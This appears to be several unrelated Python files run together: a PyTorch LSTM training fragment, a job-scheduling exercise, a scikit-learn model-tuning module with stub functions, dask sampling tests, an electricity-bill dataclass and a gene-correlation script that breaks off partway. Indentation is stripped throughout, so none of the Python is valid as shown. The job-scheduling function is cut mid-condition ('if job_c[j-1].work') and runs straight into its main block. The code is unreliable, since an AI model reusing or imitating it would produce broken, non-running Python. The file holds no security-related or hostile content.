loss = criterion(out.permute(0,2,1), targets.long())
loss.backward(retain_graph=True)
#
# Optimize
optimizer.step()
# Print error measures
print(u"Train CrossEntropyLoss: {}".format(float(loss.data)))
i+=1
print('Forget Gate Sum', sum(sum(c1.lstm.weight_ih_l0[200:400])))
# end for
# Test reservoir
dataiter = iter(test_loader)
test_u, test_y = dataiter.next()
test_u, test_y = Variable(test_u), Variable(test_y)
if use_cuda: test_u, test_y = test_u.cuda(), test_y.cuda()
y_predicted = c1(test_u)
testResutls=torch.max(y_predicted[0],dim=1)
showMe=testResutls[1]-test_y[0]
[i for i, e in enumerate(showMe) if e != 0]
#save network parameters for the record
torch.save(network.frame.state_dict(), os.path.join('E:\\', 'Abolfazl' , '2ndYearproject','code','savedNetworks','LSTMForFixedOriObj'))
#function for ploting convolutional kernels
def plot_kernels(tensor, num_cols=6):
num_kernels = tensor.shape[0]
num_rows = num_kernels // num_cols
fig = plt.figure(figsize=(num_cols,num_rows))
for i in range(num_kernels):
ax1 = fig.add_subplot(num_rows,num_cols,i+1)
ax1.imshow(tensor[i][0,:,:], cmap='gray')
ax1.axis('off')
ax1.set_xticklabels([])
ax1.set_yticklabels([])
#ploting the first conv2d layer's kernels
plot_kernels(list(c1.frontEnd.state_dict().values())[0])
#plot output layer
import numpy as np
import matplotlib.pyplot as plt
plt.figure()
plt.pcolor(c1.outLinear.weight.detach());
plt.colorbar()
plt.show()
|
class Job:
def __init__(self,available,cost,work):
self.available=available
self.cost=cost
self.work=work
def minimum(job,D):
job_a = sorted(job,key=lambda l:l.available)
for i in range(len(job)):
print(job_a[i].available,job_a[i].cost,job_a[i].work)
job_c = sorted(job,key=lambda l:l.work/l.cost,reverse=True)
W=D-job_a[0].work
for i in range(len(job)):
print(job_c[i].available,job_c[i].cost,job_c[i].work)
for i in range(len(job)):
for j in range(1,len(job)):
if job_c[j].available<=job_a[i].available:
if job_c[j-1].work
if __name__=="__main__":
job=[]
N,D=input().split()
for i in range(int(N)):
a,c,p=list(map(int,input().rstrip().split()))
job.append(Job(a,c,p))
# job = [Job(1, 2, 50), Job(3, 5, 20),
# Job(6, 19, 100), Job(2, 100, 200)]
print(minimum(job,int(D)))
'''
3 3
1 1 1
2 2 2
3 1 5
''' |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tues Jul 21
@author: Sebastian Gonzalez
"""
####################################
### Neccessary Import Statements ###
####################################
# Data Manipulation
import numpy as np
# Model Classes
from sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier
from sklearn.linear_model import LogisticRegression
from sklearn.naive_bayes import GaussianNB
from sklearn.svm import SVC
from sklearn.neighbors import KNeighborsClassifier
from sklearn.calibration import CalibratedClassifierCV
# Model Evaluation Tools
from sklearn.model_selection import GridSearchCV, RandomizedSearchCV, train_test_split
import scipy.stats as stats
# Project Tools
from src.data_scripts.feature_engineering import bow_data_loader
from src.model_scripts import model_evaluation as me
####################################
### Define our Modular Functions ###
####################################
def label_transformer(labels_arr: np.array):
"""
Purpose
-------
The purpose of this function is to take an unmodified labels array
(where all of the entries are class labels as strings) and map
each unique element to a numerical value to end up with a numerical
labels array that is more sutible for Sklearn classification models.
Parameters
----------
labels_arr : Numpy Array
This array is a collection of the class labels (as strings) for
all of the training instances that we are working with.
Returns
-------
to_return : (dict, Numpy Array)
This function returns a tuple which contains a dictionary and a
Numpy array of integer values. The dictionary is a mapper whose
keys are the old string labels and the values that they point to
are the numerical values that each instance of them in the original
labels array were replaced with. The Numpy array is the resulting
labels array after that numerical replacement.
Raises
------
AssertionError
An AssertionError can be raised by this function in a number of
different ways:
1. The first way is that if the elements of the `labels_arr`
are not strings.
2. Another way is that the array that results from substituting
in the numerical values is of a different size than the
original array of string values.
References
----------
1. https://numpy.org/doc/stable/reference/generated/numpy.unique.html
"""
# First let's collect all of the unique labels and order them in
# alphabetical order.
assert any([isinstance(labels_arr[0], np.str_),
isinstance(labels_arr[0], str)])
unique_labels_arr = np.unique(labels_arr)
# Now that we have this collection, pair up those values with a
# numerical value (sequentially).
labels_mapper = dict(
zip(unique_labels_arr.tolist(),
list(range(0, unique_labels_arr.size)))
)
# Now replace the values
numerical_labels_arr = labels_arr.copy()
for old_label, new_label in labels_mapper.items():
numerical_labels_arr[numerical_labels_arr == old_label] = new_label
assert numerical_labels_arr.size == labels_arr.size
to_return = (labels_mapper, numerical_labels_arr.astype(int))
return to_return
def cv_hyperparamter_tuning(
model,
mode: str,
run_brute=False,
**kwargs):
"""
Purpose
-------
The purpose of this function is to take in an instantiated model
object and perform 1 or 2 Cross-Validation searches to find the
optimal settings of pre-determined (or specified; see 7. in the
description of `**kwargs` in the Parameters section) hyperparameters.
Parameters
----------
model : Sklearn model object
This object is what is returned after a Sklearn model is
instantiated. This represents the model whose hyper-parameters
will be tuned by this function. Note that this function only
accepts values for this parameter that correspond to the accepted
values of the `mode` parameter (see below).
mode : str
This string specifies the name of the Sklearn model that is being
worked with by this function. Note that this function only supports
the following values for this parameter: "svm", "nb", "rf", "lr",
"adab", and "knn". Otherwise a value error will be raised.
run_brute : Bool
This Boolean controls whether or not this function also performs
a Brute Force grid CV search. It will not if it is set to False
(which is its default value) and it will if it is set to True.
**kwargs : dict
This function allows for the use of keyword argumnents to further
control its behavior. Its accepted keyword arguments are:
1. "x_train" - This REQUIRED keyword argument allows the user
to specify what feature matrix will be used to
fit the CV search object(s). If this argument
is not specifed, then a `ValueError` will be
raised.
2. "y_train" - This REQUIRED keyword argument allows the user
to specify what labels array will be used to
fit the CV search object(s). If this argument
is not specifed, then a `ValueError`will be
raised.
3. "k_value" - This keyword argument allows the user to specify
how many folds to use when performing the CV
search(es). If two such searches are performed
(meaning that the value of `run_brute` is set
to True), then specifying a value for this
argument and none for 4. and 5., will mean that
both of those searches will use the same number
of folds. Note that this parameter defaults to
a value of 5 when it is not specified.
4. "k_value_random" - This keyword argument allows the user
to specify how many folds to utilize
when performing the Randomized search.
If not specified, this parameter defaults
to the value of `k_value`.
5. "k_value_brute" - This keyword argument allows the user to
specify how many folds to utilize when
performing the Brute search. If not
specified, this parameter defaults to the
value of `k_value`. NOTE that the value
of this parameter is ignored when
`run_brute` is set to False.
6. "scoring_method" - This keyword argument allows the user
to specify what scoring method to base
the judgements of the CV search(es) on.
7. "custom_search_grid" - This keyword argument allows the user
to specify any additions and/or
updates they would like to make to
the parmater grid that is used to
perform the Randomized Search. See
the source code for the default
value of this dictionary grid. NOTE
that this parameter must be a
dictionary, otherwise a `ValueError`
will be raised.
Returns
-------
to_return : Sklearn model object
This function returns a Sklearn model object that represents the
estimator that was determined to be the best when performing the
Cross-Validated search(es).
Raises
------
ValueError
A ValueError is raised by this function when the user passes in
a non-dictionary object to the "custom_search_grid" keyword
argument.
References
----------
1. https://scikit-learn.org/stable/modules/grid_search.html#grid-search
2. https://scikit-learn.org/stable/modules/generated/sklearn.model_selection.GridSearchCV.html#sklearn.model_selection.GridSearchCV
3. https://scikit-learn.org/stable/modules/generated/sklearn.model_selection.RandomizedSearchCV.html#sklearn.model_selection.RandomizedSearchCV
4. https://scikit-learn.org/stable/modules/model_evaluation.html#scoring-parameter
5. https://docs.scipy.org/doc/scipy/reference/generated/scipy.stats.uniform.html
"""
# First, collect all neccessary variables.
parameters_to_tune_dict = {
"svm": {
"C": stats.uniform(loc=1, scale=999),
"decision_function_shape": ["ovo", "ovr"],
"gamma": ["scale", "auto"]
},
"nb": {
"var_smoothing": stats.uniform(loc=0, scale=1e-5)},
"rf": {
"max_features": ["auto", "sqrt", "log2"],
"min_samples_leaf": stats.randint(low=1, high=4),
"max_depth": stats.randint(low=1, high=6)
},
"lr": {
"C": stats.uniform(loc=1, scale=999),
"l1_ratio": stats.uniform(loc=0, scale=1)
},
"adab": {
"n_estimators": stats.randint(low=30, high=70),
"learning_rate": stats.uniform(loc=0.01, scale=0.99)
},
"knn": {
"n_neighbors": stats.randint(low=2, high=7),
"weights": ["uniform", "distance"]
}
}
search_grid_dist_dict = parameters_to_tune_dict.get(mode, None)
if isinstance(search_grid_dist_dict, type(None)):
# If the user did specify a correct value for the `mode`
# parameter value.
error_message = "The passed-in value for the mode parameter ({}) \
is not an accepted value. \nSee function doc-string for accepted \
parameter values.".format(mode)
raise ValueError(error_message)
x_train = kwargs.get("x_train", None)
y_train = kwargs.get("y_train", None)
if any([
isinstance(x_train, type(None)), isinstance(y_train, type(None))
]):
# If the user did not specify a complete training data set.
error_message = "The function expected a complete training data \
set to be passed in to the `x_train` and `y_train` keyword arguments. \
However, neither required keyword arguments were used. \nSee function \
docstring for more information."
raise ValueError(error_message)
k_value = kwargs.get("k_value", 5)
k_value_random = kwargs.get("k_value_random", k_value)
k_value_brute = kwargs.get("k_value_brute", k_value)
scoring_method = kwargs.get("scoring_method", None)
custom_search_grid = kwargs.get("custom_search_grid", {})
if not isinstance(custom_search_grid, dict):
error_message = "The passed-in value for the `custom_search_grid` \
keyword argument was of type `{}`. \nIt must be of type \
`dict`.".format(type(custom_search_grid))
raise ValueError(error_message)
search_grid_dist_dict.update(custom_search_grid)
# Start the search by first using a RandomizedGrid to narrow down
# the range of the optimal hyperparameter values.
random_search = RandomizedSearchCV(
estimator=model,
param_distributions=search_grid_dist_dict,
scoring=scoring_method,
random_state=169,
cv=k_value_random,
refit=True)
random_search_result = random_search.fit(x_train, y_train)
if run_brute:
# With this narrowed range of values, now let's perform a more
# brute foroce standard grid search IF the user has given the OK
# to do so.
random_best_params_dict = random_search_result.best_params_
search_grid_narrow_dict = random_best_params_dict.copy()
for key, value in random_best_params_dict.items():
# Let's go through the parameter dictionary we got from the
# Randomized Search to create the grid dictionary we will
# need for the brute force search.
if any([isinstance(value, int), isinstance(value, float)]):
# If we come accross any numerical values in the result
# of the randomized search, create a grid of values with
# it.
params_with_large_cont_vals = ["C"]
params_with_int_vals = ["min_samples_leaf",
"max_depth",
"n_estimators",
"n_neighbors",
"degree"]
params_in_unit_interval = ["var_smoothing",
"l1_ratio",
"learning_rate",
"tol",
"min_samples_split",
"min_samples_leaf",
"max_samples"]
if key in params_with_large_cont_vals:
# If we are working with a parameter that can take on a
# continuous value beyond the interval [0, 1].
new_grid_values = np.arange(start=value - 2,
stop=value + 2.5,
step=0.5)
final_grid_values = new_grid_values[new_grid_values >= 0]
search_grid_narrow_dict[key] = final_grid_values.tolist()
elif key in params_with_int_vals:
# If we are working with a parameter that can only
# take on integer values that are greater than 0.
new_grid_values = np.arange(start=value - 1,
stop=value + 2)
final_grid_values = new_grid_values[new_grid_values > 0]
search_grid_narrow_dict[key] = final_grid_values.tolist()
elif key in params_in_unit_interval:
# If we are working with a parameter that can take
# on a continuous value that is restricted to the
# interval [0, 1].
new_grid_values = np.arange(start=value - 0.1,
stop=value + 0.2,
step=0.1)
unit_interval_checker = np.logical_and(
new_grid_values > 0, new_grid_values <= 1)
final_grid_values = new_grid_values[unit_interval_checker]
search_grid_narrow_dict[key] = final_grid_values.tolist()
elif isinstance(value, str):
# If we come across a parameter whose value is a string,
# we do NOT want to create a grid, but instead would
# like to simply enclose that string value in a list to
# satisfy the schema of the parameter grid that the
# `GridSearchCV()` function takes.
search_grid_narrow_dict[key] = [value]
brute_search = GridSearchCV(estimator=model,
param_grid=search_grid_narrow_dict,
scoring=scoring_method,
cv=k_value_brute,
refit=True)
brute_search_result = brute_search.fit(x_train, y_train)
to_return = brute_search_result.best_estimator_
else:
# If the user does NOT want to also perform a brute force grid
# search. In that case, simply return the best estimator that
# we got form the Randomized Search.
to_return = random_search_result.best_estimator_
return to_return
def model_fitting(
parent_class_label,
mode: str,
calibrate_probs=True,
run_cv_tuning=True,
**kwargs):
"""
Purpose
-------
The purpose of this function is to provide an easy to use tool for
the user that, given a specified dataset and model, fits a Sklearn
Machine Learning Model (that may have its class probability
predicitions and/or hyperparameters tuned if specified) for future
use.
Parameters
----------
parent_class_label : NoneType or str
This stirng specifies for which parent class the user would like
to receive a list of child strings. NOTE that if you would like
for the function to return all of the class labels that live in
the tier 1 (what has oftentimes been referred to as the parent
class labels throughout this project), then simply pass in the
string "parents" to this argument.
NOTE that when this value is set to `None`, the function will
look for training/testing data in the `child_class_data` keyword
argument. If data is not passed into this argument, a `KeyError`
will be raised. The format that this argument is expecting is a
tuple of Numpy arrays, one representing the feature matrix and
the other representing the labels matrix.
mode : str
This string specifies the name of the Sklearn model that is being
worked with by this function. Note that this function only supports
the following values for this parameter: "svm", "nb", "rf", "lr",
"adab", and "knn". Otherwise a value error will be raised.
calibrate_probs : Bool
This Boolean controls whether or not this function will take the
neccessary steps to calibrate the predicted class membership
probability distribution. See 5., 6., and 7. in the References
sections for more information about the way in which this function
does this task. NOTE that this parameter has a default value of
True.
run_cv_tuning : Bool
This Boolean controls whether or not this function will using the
CV parameter tuning function defined above to determine the best
setting of the specified model for the specified data. NOTE that
this parameter has a default value of True.
**kwargs : dict
This function is set up to use keyword arguments to further specify
the behavior of this function. The accepted keywords arguments
of this function and what they do are as follows:
1. "test_data_frac" - This keyword argument allows the user
to specify what float value in [0, 1]
to use when splitting the specified
dataset into training and testing data.
This deafults to 0.25 when not specified.
2. "k_value" - This keyword argument specifies how many folds
to use when calibrating the probability
predictions of the model (specified by the
passed-in value of `mode`). NOTE that the
value of this keyword argument will be ignored
when the value of `calibrate_probs` is set to
False.
3. "child_class_data" - This keyword argument specifies what
dataset to use with this function. It
must be a tuple that contains the
feature matrix as its first argument
and the labels array as its second.
Both of these objects should be Numpy
arrays. NOTE that the value of this
argument will be ignored if the
`parent_class_label` argument is not
set to `None`.
Returns
-------
to_return : Sklearn model object
This function returns a fitted Sklearn model. The steps that this
function takes to arrive at that model is controlled by the values
of parameters such as `calibrate_probs` and `run_cv_tuning`.
Raises
------
ValueError
This function raises a ValueError is a non-accepted argument is
passed into the `mode` (required) argument.
References
----------
1. https://scikit-learn.org/stable/modules/generated/sklearn.linear_model.LogisticRegression.html
2. https://scikit-learn.org/stable/modules/svm.html
3. https://scikit-learn.org/stable/modules/generated/sklearn.ensemble.RandomForestClassifier.html
4. https://scikit-learn.org/stable/modules/naive_bayes.html
5. https://scikit-learn.org/stable/modules/generated/sklearn.naive_bayes.GaussianNB.html#sklearn.naive_bayes.GaussianNB
6. https://en.wikipedia.org/wiki/Probabilistic_classification
7.. https://scikit-learn.org/stable/modules/calibration.html
8. https://scikit-learn.org/stable/modules/generated/sklearn.calibration.CalibratedClassifierCV.html#sklearn.calibration.CalibratedClassifierCV
9. https://scikit-learn.org/stable/modules/generated/sklearn.ensemble.AdaBoostClassifier.html
10. https://scikit-learn.org/stable/modules/generated/sklearn.model_selection.train_test_split.html
11. https://scikit-learn.org/stable/modules/generated/sklearn.metrics.brier_score_loss.html#sklearn.metrics.brier_score_loss
12. https://numpy.org/doc/stable/reference/generated/numpy.argmin.html
"""
# First, collect all neccessary variables.
normalized_mode = "".join(mode.lower().split())
accepted_modes = ["svm", "nb", "rf", "lr", "adab", "knn"]
if normalized_mode not in accepted_modes:
error_message = "The passed-in value for the mode parameter ({}) \
is not an accepted value. \nSee function doc-string for accepted \
parameter values.".format(mode)
raise ValueError(error_message)
test_data_frac = kwargs.get("test_data_frac", 0.25)
k_value = kwargs.get("k_value", 5)
# Next, obtain the data that we will be needing.
if isinstance(parent_class_label, type(None)):
# If the user does NOT want this function to obtain the article
# class data by running the `bow_data_loader` function. Instead,
# they would like to specify the data to use through the keyword
# argument `child_class_data`.
feature_matrix, raw_labels_arr = kwargs.get("child_class_data",
(None, None))
if any([isinstance(feature_matrix, type(None)),
isinstance(raw_labels_arr, type(None))]):
# If the user has not correctly specified the values of the
# data that they would like for the function to use.
error_message = "By setting `parent_class_label` to `None`, \
you have specified that you would like for this function to \
use your own data. \nHowever, you have not correctly specified \
that data. See the function docstring for how to do that \
correctly."
raise ValueError(error_message)
if raw_labels_arr.dtype == "int":
# If the user has specified a labels array that has already
# been mapped to a numerical form.
numerical_labels_arr = raw_labels_arr
elif isinstance(raw_labels_arr[0], str):
# If the user has instead specified a labels array that has
# YET to be mapped to a numerical form.
_, numerical_labels_arr = label_transformer(raw_labels_arr)
else:
# If the user DOES want this function to obtain the neccessary
# data by running the `bow_data_loader` function.
feature_matrix, raw_labels_arr = bow_data_loader(parent_class_label)
# After loading, transform the labels column and then split into
# training and testing data.
_, numerical_labels_arr = label_transformer(raw_labels_arr)
# Now, split the obtained data (no matter how it was obtained) into
# training and test sets.
x_train, x_test, y_train, y_test = train_test_split(
feature_matrix,
numerical_labels_arr,
test_size=test_data_frac,
random_state=369
)
# Now, instantiate the neccessary model for the specified mode.
if normalized_mode == "svm":
# If the user would like for a Suport Vector Machine
# classification model to be fitted.
base_model = SVC(probability=True)
elif normalized_mode == "nb":
# If the user would like for a Naive Bayes classification model
# to be fitted.
base_model = GaussianNB()
elif normalized_mode == "rf":
# If the user would like for a Random Forect classification
# model to be fitted.
base_model = RandomForestClassifier(random_state=169,
class_weight="balanced")
elif normalized_mode == "lr":
# If the user would like for a Logistic Regression
# classification model to be fitted.
base_model = LogisticRegression(penalty="elasticnet",
fit_intercept=True,
class_weight="balanced",
solver="saga",
max_iter=200)
elif normalized_mode == "adab":
# If the user would like for an AdaBoost classification model to
# be fitted.
base_model = AdaBoostClassifier(algorithm="SAMME.R",
random_state=669)
elif normalized_mode == "knn":
# If the user would like for a K-Nearest-Neighbor Classifier to
# be fitted.
base_model = KNeighborsClassifier()
# Determine if we need to also perform a CV search for the optimal
# settings of the model's parameters to best fit this data.
if run_cv_tuning:
# If the user would like to use Cross-Validation to perform a
# search for the best hyper-parameter settings of the models.
tuned_model = cv_hyperparamter_tuning(model=base_model,
mode=normalized_mode,
x_train=x_train,
y_train=y_train)
else:
tuned_model = base_model
# Determine if we need to also instantiate a calibration object.
if calibrate_probs:
# If the user would like for this function to also calibrate
# the predicted class membership probability distribution.
# Instantiate the calibration model objects.
calib_sigmoid_model = CalibratedClassifierCV(
base_estimator=tuned_model, cv=k_value, method="sigmoid")
calib_isotonic_model = CalibratedClassifierCV(
base_estimator=tuned_model, cv=k_value, method="isotonic")
# Fit the calibration models with the training data.
calib_sigmoid_model.fit(x_train, y_train)
calib_isotonic_model.fit(x_train, y_train)
calibrated_models_list = [calib_sigmoid_model,
calib_isotonic_model]
# Determine which calibration works best.
prob_dist_sigmoid = calib_sigmoid_model.predict_proba(x_test)
prob_dist_isotonic = calib_isotonic_model.predict_proba(x_test)
sigmoid_brier = me.multiple_brier_score_loss(
y_test,
prob_dist_sigmoid
)
isotonic_brier = me.multiple_brier_score_loss(
y_test, prob_dist_isotonic
)
best_calib_index = np.argmin([sigmoid_brier, isotonic_brier])
# Asign best calibrated model to the `final_model` variable
# name.
final_model = calibrated_models_list[best_calib_index]
else:
# If the user would NOT like for this function to also calibrate
# the predicted class membership probability distribution.
final_model = tuned_model
to_return = final_model
return to_return
def models_comparison(parent_class_label: str, models_to_fit="all"):
"""
Purpose
-------
The purpose of this function is to
Parameters
----------
parent_class_label : str
This stirng specifies for which parent class the user would like
to receive a list of child strings. NOTE that if you would like
for the function to return all of the class labels that live in
the tier 1 (what has oftentimes been referred to as the parent
class labels throughout this project), then simply pass in the
string "parents" to this argument.
models_to_fit : str or list; default "all"
This argument allows
Returns
-------
to_return :
This function returns a
References
----------
1.
"""
# First, collect all neccessary variables that will be used for the
# rest of the function.
if models_to_fit == "all":
actual_models_to_fit = ["svm", "nb", "rf", "lr", "adab", "knn"]
else:
actual_models_to_fit = models_to_fit
# Next load in the data that will be used to train and evaluate the
# resulting models.
feature_matrix, raw_labels_arr = bow_data_loader(parent_class_label)
_, numerical_labels_arr = label_transformer(raw_labels_arr)
x_train, x_test, y_train, y_test = train_test_split(feature_matrix,
numerical_labels_arr,
test_size=0.25,
random_state=569)
# Now, use the `model_fitting()` function defined above to obtain
# a collection of fitted models.
best_models_list = [
model_fitting(
parent_class_label=None,
mode=model_name,
child_class_data=(x_train, y_train),
test_data_frac=0.15
) for model_name in actual_models_to_fit
]
# With these fitted models, use the tools in the `model_evaluation`
# module to determine which one is best. Return the one that is
# best.
unique_x_test, one_hot_y_test = me.true_classes_compilation(x_test,
y_test)
num_class_labels = one_hot_y_test.shape[1]
compiled_predictions_list = [
me.predicted_classes_compilation(
ml_model=model,
test_feature_matrix=unique_x_test,
available_labels_arr=np.arange(0, num_class_labels),
closeness_threshold=0.05
) for model in best_models_list
]
metrics_list = [
me.metric_reporter("hamming", one_hot_y_test, prediction)
for prediction in compiled_predictions_list
]
index_of_best_model = np.argmin(metrics_list)
best_model = best_models_list[index_of_best_model]
to_return = best_model
return to_return
def save_model(parent_class_label: str, run_comparison=True, **kwargs):
"""
Purpose
-------
The purpose of this function is to
Parameters
----------
parent_class_label : str
This stirng specifies for which parent class the user would like
to receive a list of child strings. NOTE that if you would like
for the function to return all of the class labels that live in
the tier 1 (what has oftentimes been referred to as the parent
class labels throughout this project), then simply pass in the
string "parents" to this argument.
run_comparison : Bool
**kwargs : dict
Returns
-------
to_return :
This function returns a string that indicates whether or not the
process undertaken to save the specified model was successful.
References
----------
1.
"""
to_return = None
###
return to_return
def load_model(parent_class_label: str, **kwargs):
"""
Purpose
-------
The purpose of this function is to
Parameters
----------
parent_class_label : str
This stirng specifies for which parent class the user would like
to receive a list of child strings. NOTE that if you would like
for the function to return all of the class labels that live in
the tier 1 (what has oftentimes been referred to as the parent
class labels throughout this project), then simply pass in the
string "parents" to this argument.
**kwargs : dict
Returns
-------
to_return :
This function returns a
References
----------
1.
"""
to_return = None
###
return to_return
|
import dask.bag as db
from dask.bag import random
def test_choices_size():
"""
Number of randomly sampled elements are exactly k.
"""
seq = range(20)
sut = db.from_sequence(seq, npartitions=3)
li = list(random.choices(sut, k=2).compute())
assert len(li) == 2
assert all(i in seq for i in li)
def test_choices_size_over():
"""
Number of randomly sampled are more than the elements.
"""
seq = range(3)
sut = db.from_sequence(seq, npartitions=3)
li = list(random.choices(sut, k=4).compute())
assert len(li) == 4
assert all(i in seq for i in li)
def test_choices_size_over_repartition():
"""
Number of randomly sampled are more than the elements on each partition.
"""
seq = range(10)
sut = db.from_sequence(seq, partition_size=9)
sut = sut.repartition(3)
li = list(random.choices(sut, k=2).compute())
assert sut.map_partitions(len).compute() == (9, 0, 1)
assert len(li) == 2
assert all(i in seq for i in li)
def test_choices_size_over_perpartition():
"""
Number of randomly sampled are more than the elements of a partition.
"""
seq = range(10)
sut = db.from_sequence(seq, partition_size=9)
li = list(random.choices(sut, k=2).compute())
assert len(li) == 2
assert all(i in seq for i in li)
def test_choices_size_over_two_perpartition():
"""
Number of randomly sampled are more than the elements of two partitions.
"""
seq = range(10)
sut = db.from_sequence(seq, partition_size=9)
li = list(random.choices(sut, k=10).compute())
assert len(li) == 10
assert all(i in seq for i in li)
|
# -*- coding: utf-8 -*-
"""Electrical billing for small consumers in Spain using PVPC. Base dataclass."""
import json
from datetime import datetime
from enum import Enum
import attr
import cattr
# Serialization hooks for datetimes and Enums
cattr.register_unstructure_hook(Enum, lambda e: e.value)
cattr.register_structure_hook(Enum, lambda s, enum_cls: enum_cls(s))
time_format = "%Y-%m-%d %H:%M:%S"
cattr.register_unstructure_hook(datetime, lambda dt: dt.strftime(time_format))
cattr.register_structure_hook(datetime, lambda s, _: datetime.strptime(s, time_format))
@attr.s
class Base:
"""
Base dataclass to store information related to the electric bill.
* Implements instance methods to serialize the data to dict or JSON
* And class constructors to
"""
def to_dict(self):
"""
Generate dict representation.
To be stored or shared, so it can be retrieved again with
`bill = FacturaData.from_dict(data)`
"""
return cattr.unstructure(self)
def to_json(self, indent=2, **kwargs) -> str:
"""
Generate JSON representation.
To be stored or shared, so it can be retrieved again with
`bill = FacturaData.from_json(json_data)`
"""
return json.dumps(self.to_dict(), indent=indent, ensure_ascii=False, **kwargs)
@classmethod
def from_dict(cls, raw_data: dict):
"""Constructor from dict representation."""
return cattr.structure(raw_data, cls)
@classmethod
def from_json(cls, raw_data: str):
"""Constructor from JSON representation."""
return cls.from_dict(json.loads(raw_data))
|
"""Get the distribution of correlation z scores for pairs a-x or x-b where x
is an intermediate between gene pair a-b.
"""
import sys
import ast
import pickle
import random
import logging
from os import path
from typing import Dict, List, Optional, Tuple
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from depmap_analysis.scripts.depmap_script_expl_funcs import axb_colname, \
bxa_colname, ab_colname, ba_colname, st_colname
from .corr_stats_async import get_corr_stats_mp, GlobalVars, get_pairs_mp
from depmap_analysis.scripts.corr_stats_data_functions import Results
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
def main(expl_df: pd.DataFrame, stats_df: pd.DataFrame, z_corr: pd.DataFrame,
reactome: Optional[Tuple[Dict[str, List[str]],
Dict[str, List[str]],
Dict[str, str]]] = None,
eval_str: Optional[bool] = False,
max_proc: Optional[int] = None,
max_corr_pairs: int = 10000,
do_mp_pairs: Optional[bool] = True,
run_linear: bool = False) -> Results:
"""Get statistics of the correlations associated with different
explanation types
Parameters
----------
expl_df: pd.DataFrame
A pd.DataFrame containing all available explanations for the pairs
of genes in z_corr. Available in the DepmapExplainer as
DepmapExplainer.expl_df.
stats_df: pd.DataFrame
A pd.DataFrame containing all checked A-B pairs and if they are
explained or not. Available in the DepmapExplainer as
DepmapExplainer.stats_df.
z_corr : pd.DataFrame
A pd.DataFrame of correlation z scores
reactome : tuple[dict]|list[dict]
A tuple or list of dicts. The first dict is expected to contain
mappings from UP IDs of genes to Reactome pathway IDs. The second
dict is expected to contain the reverse mapping (i.e Reactome IDs
to UP IDs). The third dict is expected to contain mappings from the
Reactome IDs to their descriptions.
eval_str : bool
If True, run ast.literal_eval() on the 'expl_data' column of expl_df
max_proc : int > 0
The maximum number of processes to run in the multiprocessing in
get_corr_stats_mp. Default: multiprocessing.cpu_count()
max_corr_pairs : int
The maximum number of correlation pairs to process. If the number of
eligible pairs is larger than this number, a random sample of
max_so_pairs_size is used. Default: 10 000. If the number of pairs
to check is smaller than 1000, no sampling is done.
do_mp_pairs : bool
If True, get the pairs to process using multiprocessing if larger
than 10 000. Default: True.
run_linear : bool
If True, run the script without multiprocessing. This option is good
when debugging or if the environment for some reason does not
support multiprocessing. Default: False.
Returns
-------
Results
A Dict containing correlation data for different explanations
"""
# Limit to any a-x-b OR a-b expl (this COULD include explanations where
# 'direct' and NOT 'pathway' is the explanation, but this should be a
# very small set)
logger.info("Filter expl_df to pathway, direct, shared_target")
expl_df = expl_df[
(expl_df['expl_type'] == axb_colname) |
(expl_df['expl_type'] == bxa_colname) |
(expl_df['expl_type'] == ab_colname) |
(expl_df['expl_type'] == ba_colname) |
(expl_df['expl_type'] == st_colname)
]
# Re-map the columns containing string representations of objects
if eval_str:
expl_df['expl_data'] = \
expl_df['expl_data'].apply(lambda x: ast.literal_eval(x))
# Get all correlation pairs that were explained
all_ab_corr_pairs = set(map(lambda p: tuple(p),
expl_df[['agA', 'agB']].values))
gbv = GlobalVars(expl_df=expl_df, stats_df=stats_df, sampl=16)
if not run_linear and do_mp_pairs and len(all_ab_corr_pairs) > 10000:
# Do multiprocessing
logger.info('Getting axb subj-obj pairs through multiprocessing')
gbv.assert_global_vars({'expl_df', 'stats_df'})
pairs_axb_only = get_pairs_mp(all_ab_corr_pairs, max_proc=max_proc,
max_pairs=max_corr_pairs)
else:
logger.info('Assembling axb subj-obj pairs linearly')
# Pairs where a-x-b AND NOT a-b explanation exists
pairs_axb_only = set()
logger.info("Stratifying correlations by interaction type")
for s, o in all_ab_corr_pairs:
# Make sure we don't try to explain self-correlations
if s == o:
continue
# Get all interaction types associated with s and o
int_types = \
set(expl_df['expl_type'][(expl_df['agA'] == s) &
(expl_df['agB'] == o)].values)
# Filter to a-x-b, b-x-a, st
axb_types = \
{axb_colname, bxa_colname, st_colname}.intersection(int_types)
# Only allow pairs where we do NOT have ab or ba explanation
if axb_types and \
ab_colname not in int_types and \
ba_colname not in int_types:
pairs_axb_only.add((s, o))
# Check if we need to sample
if max_corr_pairs and max_corr_pairs < len(pairs_axb_only):
logger.info(f'Down sampling number of pairs to {max_corr_pairs}')
pairs_axb_only = random.sample(pairs_axb_only, max_corr_pairs)
# Check for and remove self correlations
if not np.isnan(z_corr.loc[z_corr.columns[0], z_corr.columns[0]]):
logger.info('Removing self correlations')
diag_val = z_corr.loc[z_corr.columns[0], z_corr.columns[0]]
z_corr = z_corr[z_corr != diag_val]
# a-x-b AND NOT direct
logger.info("Getting correlations for a-x-b AND NOT direct")
options = {'so_pairs': pairs_axb_only, 'run_linear': run_linear}
if max_proc:
options['max_proc'] = max_proc
# Set and assert existence of global variables
assert_vars = {'z_cm', 'expl_df', 'stats_df'}
gbv.update_global_vars(z_cm=z_corr)
if reactome is not None:
gbv.update_global_vars(reactome=reactome)
assert_vars.add('reactome')
else:
logger.info('No reactome file provided')
if gbv.assert_global_vars(assert_vars):
results: Results = get_corr_stats_mp(**options)
else:
raise ValueError('Global variables could not be set')
return results
if __name__ == '__main__':
if len(sys.argv) < 3:
print(f"Usage: {sys.argv[0]} <basepath_to_expls> "
f"<path_to_combined_z_sc_corr_h5>")
sys.exit(0)
expl_pairs_csv = sys.argv[1] # Path to output data folder
z_corr_file = sys.argv[2] # Path to merged z scored correlations file
logger.info('Loading correlation matrix...')
z_cm = pd.read_hdf(z_corr_file)
names = [n.split()[0] for n in z_cm.columns.values]
z_cm.columns = names
z_cm.index = names
#sds = ['1_2sd', '2_3sd', '3_4sd', '4_5sd', '5_sd', 'rnd']
sds = ['3_4sd'] #, '4_5sd']
results_by_sd = {}
for sd in sds:
expl_fname = path.join(expl_pairs_csv, sd, '_explanations_of_pairs.csv')
expl_dir = path.dirname(expl_fname)
results_file = path.join(expl_dir, '%s_results_dict.pkl' % sd)
# Check if we already have the results
